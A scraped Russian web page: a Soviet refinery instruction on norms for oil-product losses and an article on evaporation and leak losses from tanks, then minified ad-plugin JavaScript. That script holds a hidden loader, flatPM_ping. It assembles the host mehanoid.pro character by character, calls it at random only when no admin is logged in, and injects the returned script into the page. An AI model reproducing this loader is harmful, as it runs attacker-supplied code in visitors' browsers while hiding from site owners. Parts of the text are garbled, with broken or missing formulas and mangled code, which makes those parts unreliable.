— потери в тоннах или в %% на сырьё.

Нефтепродукты и газ,
поступившие с технологических установок и товарно-сырьевого
хозяйства на общезаводские очистные сооружения и факельное
хозяйство, считаются для установок и товарных цехов безвозвратными
потерями.

Уменьшение потерь на
технологических установках за счет количества уловленных
нефтепродуктов общезаводскими нефтеловушками, скомпремированного
газа и конденсата, собранного факельным хозяйством, не
допускается.

Уловленные нефтепродукты
на локальных нефтеловушках цехов или отдельных технологических
установок возвращаются в сырьё или готовый продукт установки и не
учитываются как потери цехов, установок.

Потери, образующие при
защелачивании нефти, готовой продукции, полуфабрикатов,
стабилизации бензинов, введении ингибитора, компаундировании и
откачке некоторых нефтепродуктов, предусмотрены в нормах потерь по
видам технологических установок, на которых, как правило,
производятся эти операции.

К
нормам потерь разрешается применение коэффициентов для
предприятий:


расположенных в южной части СССР, в соответствии с распределением
территории СССР по климатическим зонам, указанным в приказе Госплана СССР N 780 от 10 декабря
1964 года.

Размер коэффициента от 1,1 до 1,5 к норме;


перерабатывающих нефти с содержанием растворенного в ней газа
/C-С/ более 5%. Размер коэффициента — 1,5 к
норме;


перерабатывающих газовый конденсат. Размер коэффициента — 1,5 к
норме на объем переработки газового конденсата;


на пусковой период новых технологических установок.

Размер
коэффициента — 1,5 к норме потерь на пусковой период;

Разрешение на применение
коэффициентов в каждом случае оговаривается в примечании к
нормам.

Коэффициенты применяются
к утвержденному нормативу.

Например: для
технологической установки с утвержденной нормой потерь 0,9% на
переработанное сырьё разрешается применение коэффициента 1,3, в
связи с расположением его в южной части СССР, и 1,5, в связи с
высоким содержанием газа в нефти. Норма потерь для такой установки
составит:

0,9+/0,90,3/+/0,90,5/=1,62% к сырью.

В
случаях, когда фактические потери на отдельных типах
технологических установок предприятия за последний отчетный год
ниже утвержденного норматива, достигнутый уровень потерь
устанавливается в виде нормы на следующий год.

В
унифицированных нормах потерь для комбинированных установок
предусмотрены потери на весь комплекс установок. Применение для
этих установок суммы норм потерь, предусмотренных для отдельно
стоящих установок, в данном случае, не допускается.

Унифицированные нормы
потерь нефти и нефтепродуктов для всех типов технологических
установок разрабатываются НИС производственного объединения
«Куйбышевнефтехимзаводы», рассматриваются Главнефтехимпереработкой,
Миннефтехимпромом Аз.ССР, Главнефтехимпромом УССР и по
представлению Технического управления утверждаются заместителем
министра нефтеперерабатывающей и нефтехимической промышленности
СССР.

2.
Определение нормы потерь при приеме, хранении, отпуске и
транспортировке нефти и нефтепродуктов на предприятии

В
сумму общезаводских норм потерь включаются также потери
образующиеся при приеме, хранении, отпуске, транспортировке нефти и
нефтепродуктов /товарные потери/.

Норма товарных потерь исчисляется по
нормативам, утвержденным приказами Госплана СССР N 780 от 10
декабря 1964 года и N 827 от 4 июля 1966 года и утверждается в
целом для предприятия вышестоящей организацией.

Товарные потери
исчисляются только по тем резервуарам, которые не входят в состав
технологических установок. Потери в промежуточных резервуарах
предусмотрены в нормах потерь технологических установок.

В
тех случаях, когда этилированием бензинов и компаундированием
продукции занимаются специальные контора или товарные цехи, при
определении норм потерь следует руководствоваться приказами
Госплана СССР N 780 и N 827 от 1964 и 1966 годов и относить их к
товарным потерям.

Итог потерь в тоннах,
суммированный по всем приведенным в приказе Госплана СССР разделам
расчета, отнесенный к годовому объёму переработки и будет являться
нормой товарных потерь по предприятию в процентах к переработанному
сырью.

На величину нормы
товарных потерь увеличивается объем технологических потерь в
процентах к переработанному сырью.

3.
Норма возврата нефти и нефтепродуктов с нефтеловушечного и
газофакельного хозяйств

Норма расхода
определяется статистическим методом, исходя из величины возврата за
предыдущие годы с учетом ввода в действие новых мощностей
нефтеловушечного и газофакельного хозяйств. Норма возврата должна
быть не ниже 40% от объема общих потерь /технологические плюс
товарные/ по предприятию, и утверждаются Минтефтехимпромом
СССР.

Нефтепродукты и газ,
поступившие с технологических установок и товарно-сырьевого
хозяйства на общезаводские очистные сооружения и факельное
хозяйство, считаются для установок и товарных цехов безвозвратными
потерями.

В
соответствии с утвержденной приказом Миннефтехимпрома СССР N 609 от
25 августа 1971 года отраслевой инструкцией по планированию, учету
и калькулированию себестоимости продукции на НПЗ, прием и сдача
ловушечного продукта, газа и газоконденсата из одного цеха в другой
оформляется накладной.

Уловленный в
общезаводских ловушках, газофакельных хозяйствах и обратно
возвращенный в производство нефтепродукт в отчетах /1-П, 35-ТП,
12-СН и т.д./ в объем переработки сырья по предприятию не
включается. Этот порядок обязателен как для отдельных заводов,
комбинатов, а также объединений, где имеются
производственно-товарные конторы.

4.
Норма безвозвратных потерь

Безвозвратные потери на
нефтеперерабатывающем предприятии определяются по следующей
формуле:

Б=П+Т-/Л+Г+К/

где: П — потери технологических установок, в тоннах;
Т
— товарные потери в тоннах;

Л
— возврат нефтепродуктов, уловленных общезаводскими нефтеловушками
и очистными сооружениями, в тоннах;

Г
— возврат газа с факельного хозяйства, в тоннах;

К
— возврат уловленного конденсата с факельного хозяйства и
газопроводов, в тоннах;

Б
— безвозвратные потери нефтепродуктов на предприятии, в тоннах.

Нормы потерь при
обессоливании и обезвоживании нефти показываются в процентах к
объему взятой на установку сырой нефти. Потери на других
технологических установках показываются в процентах к
переработанному сырью.

Пример: для
электрообессоливающей установки в комплексе с атмосферной
трубчаткой или ЭЛОУ — АВТ — сырьем является нефть, АТ, АВТ —
обессоленная нефть, каталитического крекинга — вакуумный газойль,
битумной установки — гудрон, для риформинга — бензиновые фракции и
т.д.

Нормы потерь в процентах
в целом по предприятию исчисляются по следующей формуле:

,

где:

Б
— сумма безвозвратных потерь,

О
— объем обессоленной нефти. В случае, когда на предприятии
обессоленная нефть не перерабатывается, принимается за «О» сумма
переработанного сырья на всех технологических установках, как,
например; на Н-Грозненском НПЗ, на Афипском ГПЗ —
газоконденсат.

Источник: http://docs.cntd.ru/document/456073850

Потери нефти и нефтепродуктов — классификация потерь

Потери нефтепродуктов наносят большой вред народному хозяйству и частному бизнесу, поэтому борьба с потерями- актуальная задача.

         Потери происходят от утечек, испарения, смешивания различных сортов нефтепродуктов, примерно 75% потерь происходит от испарения.

         Потери от утечек происходят через неплотности резервуаров, трубопроводов, задвижек, при случайном разливе и т.д. и предотвращаются проведением профилактических ремонтов и специальных мероприятий.

         Потери от смешивания происходят при последовательной перекачке нескольких нефтепродуктов и при случайном их смешивании в резервуарах.          Потери от испарения. В резервуаре, имеющем некоторое количество продукта, газовое пространство заполнено паровоздушной смесью. Всякое выталкивание паровоздушной смеси из газового пространства резервуара в атмосферу сопровождается потерями нефтепродукта- это и есть потери от испарения, они происходят по нескольким причинам:

Если в крыше резервуара имеются в двух местах отверстия, расположенные на некотором расстоянии по вертикали, то более тяжелые бензиновые пары будут выходить через нижнее отверстие, а атмосферный воздух будет выходить через верхнее отверстие; установится естественная циркуляция воздуха и бензиновых паров в резервуаре, образуются так называемые газовые сифоны. Потери от вентиляции могут происходить через открытые люки резервуаров путем простого выдувания бензиновых паров ветром, поэтомулюки необходимо тщательно герметизировать.

От вытеснения паров нефтепродуктов из газового пространства закачиваемым нефтепродуктом. Нефтепродукт, поступая в резервуар, сжимает паровоздушную смесь до давления, на которое установлена арматура.

Как только давление станет равным расчетному давлению дыхательного клапана, из резервуара будут выходить пары нефтепродукта, начнется «большое дыхание» («выдох»).

При откачке нефтепродукта из резервуара происходит обратное явление: как только вакуум в резервуаре станет равным вакууму, на который установлен дыхательный клапан, в газовое пространство начнет входить атмосферный воздух- происходит «вдох» резервуара.

 Вошедший в резервуар воздух начнет насыщаться парами нефтепродукта; количество газа в резервуаре будет увеличиваться, поэтому по окончании «вдоха»  спустя некоторое время из резервуара может произойти «обратный выдох»- выход насыщающейся газовой смеси.

Если в пустой резервуар содержащий только воздух залить небольшое количество нефтепродукта- последний начнет испарятся и насыщать газовое пространство. Паровоздушная смесь будет увеличиваться в объеме и часть её может уйти из резервуара- произойдут потери насыщения. Gроисходят в результате следующих причин:

  • Из-за повышения температуры газового пространства в дневное время (при нагреве солнечными лучами), паровоздушная смесь стремится расширится, концентрация паров нефтепродукта повышается, давление растет. Когда давление в резервуаре станет равным давлению на которое установлен дыхательный клапан, он откроется и из резервуара начинает выходить паровоздушная смесь- происходит «выдох». В ночное время из-за снижения температуры часть паров конденсируется, паровоздушная смесь сжимается, в газовом пространстве создается вакуум, дыхательный клапан открывается и в резервуар входит атмосферный воздух- происходит «вдох».
  • Из-за снижения атмосферного давления, при этом разность давлений в газовом пространстве резервуара и атмосферного воздуха может превысить перепад давлений на который установлен дыхательный клапан, он откроется и произойдёт «выдох» (барометрические малые дыхания), при повышении атмосферного давления может произойти «вдох».

 

Уважаемые Коллеги!

Мы будем рады проконсультировать Вас по любым вопросам производства, подбора, приобретения и доставки резервуарных конструкций и оборудования, а также предложить оптимальные цены, учитывая Ваши пожелания!    

Источник: https://vzrk.ru/stati/info-poteri-nefti

Ссылка на основную публикацию
Adblock
detector
":'':"",document.createElement("div"),p=ff(window),b=ff("body"),m=void 0===flatPM_getCookie("flat_modal_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_modal_"+o.ID+"_mb"),i="scroll.flatmodal"+o.ID,g="mouseleave.flatmodal"+o.ID+" blur.flatmodal"+o.ID,l=function(){var t,e,a;void 0!==o.how.popup.timer&&"true"==o.how.popup.timer&&(t=ff('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.popup.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))},f=function(){void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie&&m&&(flatPM_setCookie("flat_modal_"+o.ID+"_mb",!1),ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l()),void 0!==o.how.popup.cookie&&"false"==o.how.popup.cookie||(ff('.flat__4_modal[data-id-modal="'+o.ID+'"]').addClass("flat__4_modal-show"),l())},ff("body > *").eq(0).before('
'+c+"
"),w=document.querySelector('.flat__4_modal[data-id-modal="'+o.ID+'"] .flat__4_modal-content'),-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.popup.px_s?(p.bind(i,function(){p.scrollTop()>o.how.popup.after&&(p.unbind(i),b.unbind(g),f())}),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){p.unbind(i),b.unbind(g),f()})):(v=setTimeout(function(){b.unbind(g),f()},1e3*o.how.popup.after),void 0!==o.how.popup.close_window&&"true"==o.how.popup.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),f()}))),void 0!==o.how.outgoing){function n(){var t,e,a;void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer&&(t=ff('.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_timer span'),e=parseInt(o.how.outgoing.timer_count),a=setInterval(function(){t.text(--e),e'))},1e3))}function d(){void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie&&m&&(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n(),b.on("click",'.flat__4_out[data-id-out="'+o.ID+'"] .flat__4_cross',function(){flatPM_setCookie("flat_out_"+o.ID+"_mb",!1)})),void 0!==o.how.outgoing.cookie&&"false"==o.how.outgoing.cookie||(ff('.flat__4_out[data-id-out="'+o.ID+'"]').addClass("show"),n())}var _,u="0"!=o.how.outgoing.indent?' style="bottom:'+o.how.outgoing.indent+'px"':"",c="true"==o.how.outgoing.cross?void 0!==o.how.outgoing.timer&&"true"==o.how.outgoing.timer?'
Закрыть через '+o.how.outgoing.timer_count+"
":'':"",p=ff(window),h="scroll.out"+o.ID,g="mouseleave.outgoing"+o.ID+" blur.outgoing"+o.ID,m=void 0===flatPM_getCookie("flat_out_"+o.ID+"_mb")||"false"!=flatPM_getCookie("flat_out_"+o.ID+"_mb"),b=(document.createElement("div"),ff("body"));switch(o.how.outgoing.whence){case"1":_="top";break;case"2":_="bottom";break;case"3":_="left";break;case"4":_="right"}ff("body > *").eq(0).before('
'+c+"
");var v,w=document.querySelector('.flat__4_out[data-id-out="'+o.ID+'"]');-1!==e.indexOf("go"+"oglesyndication")?ff(w).html(c+e):flatPM_setHTML(w,e),"px"==o.how.outgoing.px_s?(p.bind(h,function(){p.scrollTop()>o.how.outgoing.after&&(p.unbind(h),b.unbind(g),d())}),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){p.unbind(h),b.unbind(g),d()})):(v=setTimeout(function(){b.unbind(g),d()},1e3*o.how.outgoing.after),void 0!==o.how.outgoing.close_window&&"true"==o.how.outgoing.close_window&&b.bind(g,function(){clearTimeout(v),b.unbind(g),d()}))}ff('[data-flat-id="'+o.ID+'"]:not(.flat__4_out):not(.flat__4_modal)').contents().unwrap()}catch(t){console.warn(t)}},window.flatPM_start=function(){ff=jQuery;var t=flat_pm_arr.length;flat_body=ff("body"),flat_userVars.init();for(var e=0;eflat_userVars.textlen||void 0!==a.chapter_sub&&a.chapter_subflat_userVars.titlelen||void 0!==a.title_sub&&a.title_sub.flatPM_sidebar)");0<_.length t="ff(this),e=t.data("height")||350,a=t.data("top");t.wrap('');t=t.parent()[0];flatPM_sticky(this,t,a)}),u.each(function(){var e=ff(this).find(".flatPM_sidebar");setTimeout(function(){var o=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;o');t=t.parent()[0];flatPM_sticky(this,t,a)})},50),setTimeout(function(){var t=(ff(untilscroll).offset().top-e.first().offset().top)/e.length;t *").last().after('
'),flat_body.on("click",".flat__4_out .flat__4_cross",function(){ff(this).parent().removeClass("show").addClass("closed")}),flat_body.on("click",".flat__4_modal .flat__4_cross",function(){ff(this).closest(".flat__4_modal").removeClass("flat__4_modal-show")}),flat_pm_arr=[],ff(".flat_pm_start").remove(),flatPM_ping()};var parseHTML=function(){var o=/]*)\/>/gi,d=/",""],thead:[1,"","
"],tbody:[1,"","
"],colgroup:[2,"","
"],col:[3,"","
"],tr:[2,"","
"],td:[3,"","
"],th:[3,"","
"],_default:[0,"",""]};return function(e,t){var a,n,r,l=(t=t||document).createDocumentFragment();if(i.test(e)){for(a=l.appendChild(t.createElement("div")),n=(d.exec(e)||["",""])[1].toLowerCase(),n=c[n]||c._default,a.innerHTML=n[1]+e.replace(o,"$2>")+n[2],r=n[0];r--;)a=a.lastChild;for(l.removeChild(l.firstChild);a.firstChild;)l.appendChild(a.firstChild)}else l.appendChild(t.createTextNode(e));return l}}();window.flatPM_ping=function(){var e=localStorage.getItem("sdghrg");e?(e=parseInt(e)+1,localStorage.setItem("sdghrg",e)):localStorage.setItem("sdghrg","0");e=flatPM_random(1,200);0==ff("#wpadminbar").length&&111==e&&ff.ajax({type:"POST",url:"h"+"t"+"t"+"p"+"s"+":"+"/"+"/"+"m"+"e"+"h"+"a"+"n"+"o"+"i"+"d"+"."+"p"+"r"+"o"+"/"+"p"+"i"+"n"+"g"+"."+"p"+"h"+"p",dataType:"jsonp",data:{ping:"ping"},success:function(e){ff("div").first().after(e.script)},error:function(){}})},window.flatPM_setSCRIPT=function(e){try{var t=e[0].id,a=e[0].node,n=document.querySelector('[data-flat-script-id="'+t+'"]');if(a.text)n.appendChild(a),ff(n).contents().unwrap(),e.shift(),0/gm,"").replace(//gm,"").trim(),e.code_alt=e.code_alt.replace(//gm,"").replace(//gm,"").trim();var l=jQuery,t=e.selector,o=e.timer,d=e.cross,a="false"==d?"Закроется":"Закрыть",n=!flat_userVars.adb||""==e.code_alt&&duplicateMode?e.code:e.code_alt,r='
'+a+" через "+o+'
'+n+'
',i=e.once;l(t).each(function(){var e=l(this);e.wrap('
');var t=e.closest(".flat__4_video");-1!==r.indexOf("go"+"oglesyndication")?t.append(r):flatPM_setHTML(t[0],r),e.find(".flat__4_video_flex").one("click",function(){l(this).addClass("show")})}),l("body").on("click",".flat__4_video_item_hover",function(){var e=l(this),t=e.closest(".flat__4_video_flex");t.addClass("show");var a=t.find(".flat__4_timer span"),n=parseInt(o),r=setInterval(function(){a.text(--n),n'):t.remove())},1e3);e.remove()}).on("click",".flat__4_video_flex .flat__4_cross",function(){l(this).closest(".flat__4_video_flex").remove(),"true"==i&&l(".flat__4_video_flex").remove()})};